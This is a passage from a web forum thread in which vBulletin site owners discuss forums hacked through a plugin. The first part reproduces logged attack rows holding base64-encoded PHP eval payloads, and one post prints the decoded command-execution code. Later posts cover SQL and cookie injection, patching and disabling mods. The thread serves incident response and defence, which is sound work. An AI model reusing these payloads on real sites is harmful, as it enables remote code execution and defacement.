Y2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZi gkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBw Y2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));di e;";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i:0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0:"";} |
| e783bb5c77bf9a59f9d63d9551a53cd6 | 81.94.196.51 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 | 1297787694 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:963:"eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZW NobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0i ZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZC k7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2Zl KXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaW YoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNm ZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQ plbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykp ew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZW lmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0 YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZX RfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVs c2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG 9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0g QG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw 0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3Blbigk Y2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZi gkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBw Y2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));di e;";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i:0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0:"";} |
| bbc645e5264e506520e938c779d4f23d | 67.192.224.98 | Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4 | 1298619810 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:919:"eval(base64_decode('ZWNobyAiQkhMVGVhbTxicj4iOwplY2 hvICJzeXM6Ii5waHBfdW5hbWUoKS4iPGJyPiI7CiRjbWQ9ImVj aG8gVW5EZXJHcm91bkQiOwokZXNlZ3VpY21kPWV4KCRjbWQpOw plY2hvICRlc2VndWljbWQ7CmZ1bmN0aW9uIGV4KCRjZmUpewok cmVzID0gJyc7CmlmICghZW1wdHkoJGNmZSkpewppZihmdW5jdG lvbl9leGlzdHMoJ2V4ZWMnKSl7CkBleGVjKCRjZmUsJHJlcyk7 CiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7Cn0KZWxzZWlmKGZ1bm N0aW9uX2V4aXN0cygnc2hlbGxfZXhlYycpKXsKJHJlcyA9IEBz aGVsbF9leGVjKCRjZmUpOwp9CmVsc2VpZihmdW5jdGlvbl9leG lzdHMoJ3N5c3RlbScpKXsKQG9iX3N0YXJ0KCk7CkBzeXN0ZW0o JGNmZSk7CiRyZXMgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7CkBvYl 9lbmRfY2xlYW4oKTsKfQplbHNlaWYoZnVuY3Rpb25fZXhpc3Rz KCdwYXNzdGhydScpKXsKQG9iX3N0YXJ0KCk7CkBwYXNzdGhydS gkY2ZlKTsKJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsKQG9i X2VuZF9jbGVhbigpOwp9CmVsc2VpZihAaXNfcmVzb3VyY2UoJG YgPSBAcG9wZW4oJGNmZSwiciIpKSl7CiRyZXMgPSAiIjsKd2hp bGUoIUBmZW9mKCRmKSkgeyAkcmVzIC49IEBmcmVhZCgkZiwxMD I0KTsgfQpAcGNsb3NlKCRmKTsKfX0KcmV0dXJuICRyZXM7Cn0= '));die;";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i:0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0:"";} |


...cont'd in next post due to character limits

| 8c4734033eff728379948bcfb8f45653 | 202.136.168.37 | Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/ | 1299793822 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZW NobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0i ZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZC k7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2Zl KXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaW YoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNm ZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQ plbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykp ew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZW lmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0 YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZX RfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVs c2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG 9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0g QG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw 0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3Blbigk Y2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZi gkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBw Y2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));di e();";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i:0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0:"";} |
| 9f0427858f5c797717a3aaf69e082c01 | 207.58.131.77 | Mozilla/3.0 (X11; I; SunOS 5.4 sun4m) | 1300883385 | | index | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZW NobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0i ZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZC k7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2Zl KXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaW YoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNm ZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQ plbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykp ew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZW lmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0 YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZX RfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVs c2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG 9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0g QG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw 0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3Blbigk Y2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZi gkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBw Y2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));di e();";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i:0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0:"";} |
| c1d576eaa0bf6e9b1867413a940cf56a | 207.58.131.77 | Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7 | 1300883385 | | index | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZW NobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0i ZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZC k7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2Zl KXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaW YoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNm ZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQ plbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykp ew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZW lmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0 YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZX RfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVs c2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG 9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0g QG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw 0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3Blbigk Y2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZi gkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBw Y2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));di e();";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i:0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0:"";} |
| c3f76c51b678d379c20cbbc5580e20ad | 80.38.87.254 | Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) | 1301251374 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZW NobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0i ZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZC k7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2Zl KXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaW YoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNm ZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQ plbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykp ew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZW lmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0 YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZX RfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVs c2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG 9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0g QG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw 0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3Blbigk Y2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZi gkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBw Y2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));di e();";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i:0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0:"";} |
| 85fbda11bb0d353a5b4db40ad309b0dc | 88.80.207.132 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b | 1301678740 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZW NobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0i ZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZC k7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2Zl KXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaW YoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNm ZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQ plbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykp ew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZW lmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0 YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZX RfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVs c2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG 9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0g QG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw 0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3Blbigk Y2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZi gkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBw Y2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));di e();";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i:0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0:"";} |
| f7b4a57131b4887a2a1eea92376e9697 | 205.204.32.194 | Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320) | 1302083349 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZW NobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0i ZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZC k7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2Zl KXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaW YoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNm ZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQ plbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykp ew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZW lmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0 YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZX RfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVs c2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG 9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0g QG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw 0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3Blbigk Y2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZi gkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBw Y2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));di e();";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i:0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0:"";} |
| f8b72c4b4b12138accc7f62c2692ce98 | 183.99.33.109 | Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) | 1305032315 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZW NobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0i ZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZC k7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2Zl KXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaW YoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNm ZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQ plbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykp ew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZW lmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0 YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZX RfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVs c2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG 9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0g QG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw 0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3Blbigk Y2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZi gkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBw Y2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));di e();";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i:0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0:"";} |



One way people make mass chances of that nature is to use a mass defacer script. In part the code I removed from the database did allow for php or shell commands to be executed without placing files into the account.

One occurrence was at: Tue May 10 07:58:35 CDT 2011 by this IP: 183.99.33.109


echo "v0pCr3w
";
echo "sys:".php_uname()."
";
$cmd="echo nob0dyCr3w";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}

Anyone who was using the old version of the Advanced Forum Rules mod, any version, could/was suspect to hackers. There is a fixed update somewhere. Best thing to do is uninstall the mod, remove all files from the server, and re-upload the updated version.

Might want to try to understand that ANY AND ALL code is susceptible to exploits - hence the reason there are always updates and patches offered (even for operating systems, and vBulletin core software, etc.).

I don't necessarily agree with the idea that ALL code is susceptible to exploits. It depends on what the code does.

I don't necessarily agree with the idea that ALL code is susceptible to exploits. It depends on what the code does.
Sorry for the misinterpretation. What I intended to convey was that it's NOT just hacks and mods that are susceptible to being hacked...so removing all mods won't unilaterally make a site safe. This exploit could just as easily have been found in the base vBulletin code; or even an exploit in coding within the server OS, etc.

Vigilance in keeping up to date on ALL software patches & updates is still needed to have any real security; and even then - there's ALWAYS a risk.

Daily back-ups is your only real security.

I keep reading "hacked by team Anus".

Haha that would be appropriate wouldn't it? lol At least some of us still see a lighter side.

Just lets not jump at the developers throat, like aquariumpros said the issue couldve come from anywhere. It's unfortunate that it was Valter who was the one in the primary line of fire this time. Fundamentally the web is worse than reality as far as safety is concerned so what more do we argue from there?

Boofo is right. Not everything is evil but there is always someone trying to better something that causes an addition that is slightly overlooked. But if we said ok Windows 98 is the shit we dont need to go anywhere from here or worse if apple said ok iMac thats it weve done perfect lets not screw it up where would we be today?

In that same light no add-ons at all would be similar to saying ok Im born. I'm vanilla there are viruses and germs out there so I'm going to build a sanitized glass orb and live in it the rest of my life. But in a funny kind of way VB allows backups that make risks a little manageable. Life doesn't really give us that option in the ideal form does it? Something to ponder. Make use of it I'm sure its been said a gazillion times before.

You also have to remember how long Valter's mod was out before it got exploited. All it takes is someone playing around with something long enough to find a way around certain things. Valter is an excellent coder that caught an unlucky break that could happen to any one of us.

You also have to remember how long Valter's mod was out before it got exploited. All it takes is someone playing around with something long enough to find a way around certain things. Valter is an excellent coder that caught an unlucky break that could happen to any one of us.

+100

+100

Well, it couldn't happen to me, but it could happen to all the rest of the coders. ;)

Well, it couldn't happen to me, but it could happen to all the rest of the coders. ;)

So true ;).






































:p

After they got into the Admin Panel they could have easily add a plugin which would allow them to upload something on the site, i.e php shell for modifying of the current files, or uploading of the newer files.

Would that allow them to upload outside of the forum directory? That is what they did to me. The forum directory resides withing my public_html (user/public_html/forums) they uploaded files to (user/public_html). I suspect this issue goes deeper than everybody thinks.

Would that allow them to upload outside of the forum directory? That is what they did to me. The forum directory resides withing my public_html (user/public_html/forums) they uploaded files to (user/public_html). I suspect this issue goes deeper than everybody thinks.

If they upload a shell type of script then it's pretty much out the door imo.

http://en.wikipedia.org/wiki/Shell_script

Lol Boofo. But thats the thing with people. You'd use something for years and the minute something goes wrong you scream at shout and burn it to the ground. Sad reality.

Nickbe from following the issue quite closely if they get into the sql from there uploading content etc to your home directory is peanuts apparently.(if I recall that bit of info correctly) Well fundamentally its the maximum that can be done isn't it? Unless it escalates to your hosts and whole server getting hacked. That is unlikely I suspect? A vulnerability always results in either losing admin rights of a board, your files being erased or your account used to host the hackers files on the sly. But this seems to be more of a bragging rights venture by the looks of it ? I guess all the small time hackers will pick up on the yet unpatched board and continue the mischief.

Ok so they can hack the plugin to find a whole and get into the SQL or so....yes??
I was checking Valter's plugin and now it's quarantine, what happened now with it????

Should we disable it or is there a way that Valter will fix it ?!?!?

Can't post in the thread for news :(

Cheers

Yes essentially thats what I understood reading the posts.

It was quarantined yesterday because someone seems to have found another exploit (a few pages back on this thread I think) even with the latest update. I'd suggest disabling it in the least if you have a large/well known board. I just copied over my rules and uninstalled it completely for now. That dumps the SQL tables as well as I didn't want to risk it.

He will fix it no doubt. The first time around the fix came within a few hours. But there doesn't seem to be any Valter activity yet. He could just be busy elsewhere.

Yeah once its quarantined it gets locked. I ended up here for the same reason.

I'm not convinced Advanced Forum Rules is the attack vector for the latest round. Sites that have never used it have reportedly been attacked.

Retracted. :o

I found a hole in the cookie handling code due to the use of the PHP eval function.
I.e. the hacker pre-sets a cookie to contain malicious code, and the eval function runs it when it picks up the cookie content (that it was expecting to be something else).


Kym

He will fix it no doubt. The first time around the fix came within a few hours. But there doesn't seem to be any Valter activity yet. He could just be busy elsewhere.

Valter responded to my PM this morning, it's been fixed and it's awaiting reactivation (or whatever they call it). But yeah, if you have the latest installed it should be disabled now I would think. I don't think you'd actually have to uninstall it because when you disable it the plugins are inactive.

I'm not convinced Advanced Forum Rules is the attack vector for the latest round. Sites that have never used it have reportedly been attacked.


That's right, I haven't seen any evidence that this mod was actually used for any attack (not that I've looked that hard - maybe on vbulletin.com?).

As for the "uninstall all mods" person, if you want your server to be safe from hacking unplug it from the internet (and keep it in a locked room).

Not a single site i have done repair work on was missing the specific mod in question. Not a single site i repaired had no modifications.

Well, fair enough - that's a pretty strong argument.

Ok so they can hack the plugin to find a whole and get into the SQL or so....yes??
I was checking Valter's plugin and now it's quarantine, what happened now with it????

Should we disable it or is there a way that Valter will fix it ?!?!?

Can't post in the thread for news :(

Cheers

I reported the mod yesterday because I found the exploit.

And with the user table info on the 3rd page I even know how they got in there :D
interesting. It feels like solving a murder case ^^

It feels like solving a murder case ^^

Gut gemacht Inspector Derrick :D

Would that allow them to upload outside of the forum directory? That is what they did to me. The forum directory resides withing my public_html (user/public_html/forums) they uploaded files to (user/public_html). I suspect this issue goes deeper than everybody thinks.

Hey Nickbe,
They could have firstly uploaded the shell to the forum dir, and then upload another one (because php shells allow browsing of the directories on a certain web hosting account) in another writeable directory.

So yeah, even if they manage to get into your admin panel, and if you have no writeable directories you're pretty much safe.

That is not completely true, really depends on the servers setup and configuration.

Is "VSa - Advanced Registration" safe?

I do want to make one thing perfectly clear!

If you find that a currently installed modification on your site is "Quarantined" or "Discontinued" or in the "Modification Graveyard" for any sort of security issue you need to disable the modification IMMEDIATELY.

You don't want to uninstall unless you truly do not want the functionality otherwise when it's patched/fixed and you update all of your rules are gone or if it was a "Thanks" mod for example all of your thanks would be removed as you uninstalled.

Tks for all the info's guys! Much appreciated ;)

Seems like this one will make others talk as some might have weaknesses also that have not yet been approched?!?
Tho, even with a good alarm system, if they want to steal, they will find a way loll ;)

I know for a fact that lots of hackers or geeks try to infiltrate anything they can for pleasure, i get so many deny/block IP's report of failed login in my VPS/WHM that it's nuts!!!! A good firewall and well adjusted server security is always the key to peace and tranquility.....as long as it works lolll ;)

Cheers

<a href="https://vborg.vbsupport.ru/showpost.php?p=2195551&postcount=53" target="_blank">https://vborg.vbsupport.ru/showp...1&postcount=53</a>

I spend an hour on the weekend having a look at the plugin code.
I found an issue with the cookie handling because of the use of an eval function.

The first patch fixed the SQL injection but not cookie injection.

NVM. figured it out

NVM. figured it out

https://vborg.vbsupport.ru/showpost.php?p=2195551&postcount=53

I spend an hour on the weekend having a look at the plugin code.
I found an issue with the cookie handling because of the use of an eval function.

The first patch fixed the SQL injection but not cookie injection.


Any info that you could share with us regarding the bug that we could fix in the script???

It could help everyone here ;)

Well Valters fixed it again. Hopefully thats the end of holes for this one and the poor man being hounded down.

I never once used this hack and my forum was hacked twice, once someone using some sort of iframe, and this last time someone edited forum.php to simply say "Xuplena"...

Not sure what is going on my pc is clean, and I have since added extra security against SQL injections. And I never once used Advanced Forum RUles.

There is also, word around hacking forums that there is an exploit out that effects 4.x.x. - 4.1.3

It is confirmed that there is a very new exploit out there. be careful /

I never once used this hack and my forum was hacked twice, once someone using some sort of iframe, and this last time someone edited forum.php to simply say "Xuplena"... <snip>
That sure changes the game... (bold emphasis mine)

--------------- Added 1305900973 at 1305900973 ---------------

<snip> It is confirmed that there is a very new exploit out there. be careful / Where is it confirmed?

I never once used this hack and my forum was hacked twice, once someone using some sort of iframe, and this last time someone edited forum.php to simply say "Xuplena"...

Not sure what is going on my pc is clean, and I have since added extra security against SQL injections. And I never once used Advanced Forum RUles.

There is also, word around hacking forums that there is an exploit out that effects 4.x.x. - 4.1.3

It is confirmed that there is a very new exploit out there. be careful /
Please dont go around posting FUD. If you do not have a link to an exploit report, chances are there isn't one in the wild.

hi,

hmmmm people give valter a break.Ok i wasn't using that mod with a security hole and i can undestand the frusteration and anger you feel when your site is hacked but this coder is human and humans regardless of there amount of knowledge do make mistakes

the one (and only for that matter) 100% secure code is the one a human never wrote

i can't stand the bashing at the mod author stop it to me he is a respected coder i mean i don't know him but it's just plain bad to going to critize all of his work just because of one bad one

